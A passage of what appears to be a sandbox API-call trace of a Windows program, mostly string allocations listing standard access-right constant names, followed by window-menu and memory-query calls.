[0110.395] SysReAllocStringLen (in: pbstr=0x291e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e5f0*="DELETE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e5e0*="READ_CONTROL") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e5d0*="WRITE_OWNER") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e5c0*="WRITE_DAC") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x291e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x291e5a0*="THREAD_IMPERSONATE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x291e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x291e580*="THREAD_QUERY_INFORMATION") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x291e570*="THREAD_SET_INFORMATION") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x291e560*="THREAD_SET_CONTEXT") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x291e550*="THREAD_GET_CONTEXT") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x291e540*="THREAD_SUSPEND_RESUME") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x291e530*="THREAD_TERMINATE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x291e520*="THREAD_ALL_ACCESS") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e500*="STANDARD_RIGHTS_WRITE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e4f0*="STANDARD_RIGHTS_READ") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e4d0*="DELETE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e4c0*="READ_CONTROL") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e4b0*="WRITE_OWNER") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e4a0*="WRITE_DAC") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x291e490*="PROCESS_QUERY_INFORMATION") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x291e480*="PROCESS_SET_INFORMATION") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x291e470*="PROCESS_SET_QUOTA") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x291e460*="PROCESS_CREATE_PROCESS") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x291e450*="PROCESS_DUP_HANDLE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x291e440*="PROCESS_VM_WRITE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x291e430*="PROCESS_VM_READ") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x291e420*="PROCESS_VM_OPERATION") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x291e410*="PROCESS_SET_SESSIONID") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x291e400*="PROCESS_CREATE_THREAD") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x291e3f0*="PROCESS_TERMINATE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x291e3e0*="PROCESS_ALL_ACCESS") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.396] SysReAllocStringLen (in: pbstr=0x291e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e3b0*="STANDARD_RIGHTS_READ") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e390*="DELETE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e380*="READ_CONTROL") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e370*="WRITE_OWNER") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e360*="WRITE_DAC") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x291e350*="PERM_FILE_CREATE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x291e340*="PERM_FILE_WRITE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x291e330*="PERM_FILE_READ") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e310*="STANDARD_RIGHTS_WRITE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e300*="STANDARD_RIGHTS_READ") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e2e0*="DELETE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e2d0*="READ_CONTROL") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e2c0*="WRITE_OWNER") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e2b0*="WRITE_DAC") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x291e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x291e290*="PRINTER_ACCESS_USE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x291e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x291e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x291e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x291e250*="PRINTER_ALL_ACCESS") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x291e240*="PRINTER_EXECUTE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x291e230*="PRINTER_WRITE") returned 1
[0110.397] SysReAllocStringLen (in: pbstr=0x291e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x291e220*="PRINTER_READ") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x291e210*="PRINTER_ALL_ACCESS") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e200*="DELETE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e1f0*="READ_CONTROL") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e1e0*="WRITE_OWNER") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e1d0*="WRITE_DAC") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x291e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x291e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x291e1a0*="SC_MANAGER_LOCK") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x291e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x291e180*="SC_MANAGER_CONNECT") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x291e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x291e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e140*="STANDARD_RIGHTS_WRITE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e130*="STANDARD_RIGHTS_READ") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e120*="STANDARD_RIGHTS_ALL") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e110*="DELETE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e100*="READ_CONTROL") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e0f0*="WRITE_OWNER") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e0e0*="WRITE_DAC") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x291e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x291e0c0*="SERVICE_STOP") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x291e0b0*="SERVICE_START") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x291e0a0*="SERVICE_QUERY_STATUS") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x291e090*="SERVICE_QUERY_CONFIG") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x291e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x291e070*="SERVICE_INTERROGATE") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x291e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x291e050*="SERVICE_CHANGE_CONFIG") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x291e040*="SERVICE_ALL_ACCESS") returned 1
[0110.398] SysReAllocStringLen (in: pbstr=0x291e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e020*="STANDARD_RIGHTS_WRITE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e010*="STANDARD_RIGHTS_READ") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e000*="STANDARD_RIGHTS_ALL") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291dff0*="DELETE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291dfe0*="READ_CONTROL") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291dfd0*="WRITE_OWNER") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291dfc0*="WRITE_DAC") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x291dfb0*="KEY_SET_VALUE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x291dfa0*="KEY_CREATE_LINK") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x291df90*="KEY_CREATE_SUB_KEY") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x291df80*="KEY_NOTIFY") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x291df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x291df60*="KEY_QUERY_VALUE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291df40*="STANDARD_RIGHTS_WRITE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x291df30*="STANDARD_RIGHTS_READ 2") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x291df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291df10*="DELETE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291df00*="READ_CONTROL") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291def0*="WRITE_OWNER") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291dee0*="WRITE_DAC") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x291ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x291dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x291deb0*="DESKTOP_JOURNALRECORD") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x291dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x291de90*="DESKTOP_HOOKCONTROL") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x291de80*="DESKTOP_CREATEWINDOW") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x291de70*="DESKTOP_CREATEMENU") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x291de60*="DESKTOP_READOBJECTS") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x291de50*="DESKTOP_ENUMERATE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291de30*="STANDARD_RIGHTS_WRITE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291de20*="STANDARD_RIGHTS_READ") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291de10*="STANDARD_RIGHTS_ALL") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291de00*="DELETE") returned 1
[0110.399] SysReAllocStringLen (in: pbstr=0x291ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291ddf0*="READ_CONTROL") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291dde0*="WRITE_OWNER") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291ddd0*="WRITE_DAC") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x291ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x291ddb0*="WINSTA_READSCREEN") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x291dda0*="WINSTA_READATTRIBUTES") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x291dd90*="WINSTA_EXITWINDOWS") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x291dd80*="WINSTA_ENUMERATE") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x291dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x291dd60*="WINSTA_CREATEDESKTOP") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x291dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x291dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291dd10*="STANDARD_RIGHTS_READ") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x291dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291dcf0*="READ_CONTROL") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x291dce0*="SI_ACCESS_SPECIFIC") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291dcd0*="WRITE_DAC") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x291dcc0*="FILE_DELETE") returned 1
[0110.400] SysReAllocStringLen (in: pbstr=0x291dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x291dcb0*="FILE_DELETE_CHILD") returned 1
[0110.401] SetClassLongA (hWnd=0x301e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0110.402] GetSystemMenu (hWnd=0x301e4, bRevert=0) returned 0x30221
[0110.402] DeleteMenu (hMenu=0x30221, uPosition=0xf030, uFlags=0x0) returned 1
[0110.402] DeleteMenu (hMenu=0x30221, uPosition=0xf000, uFlags=0x0) returned 1
[0110.402] DeleteMenu (hMenu=0x30221, uPosition=0xf010, uFlags=0x0) returned 1
[0110.402] GetCurrentThreadId () returned 0xfa0
[0110.402] ResetEvent (hEvent=0xa0) returned 1
[0110.402] GetCurrentThreadId () returned 0xfa0
[0110.402] GetCurrentThreadId () returned 0xfa0
[0110.402] GetCurrentThreadId () returned 0xfa0
[0110.402] ResetEvent (hEvent=0xa0) returned 1
[0110.402] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f43c, fWinIni=0x0 | out: pvParam=0x24f43c) returned 1
[0110.402] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f43c, fWinIni=0x0 | out: pvParam=0x24f43c) returned 1
[0110.402] GetSystemMetrics (nIndex=49) returned 16
[0110.402] GetSystemMetrics (nIndex=50) returned 16
[0110.403] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f484, fWinIni=0x0 | out: pvParam=0x24f484) returned 1
[0110.403] IsWindowVisible (hWnd=0x301e4) returned 0
[0110.403] GetCurrentThreadId () returned 0xfa0
[0110.403] VirtualQuery (in: lpAddress=0x28f1668, lpBuffer=0x24f354, dwLength=0x1c | out: lpBuffer=0x24f354*(BaseAddress=0x28f1000, AllocationBase=0x2830000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
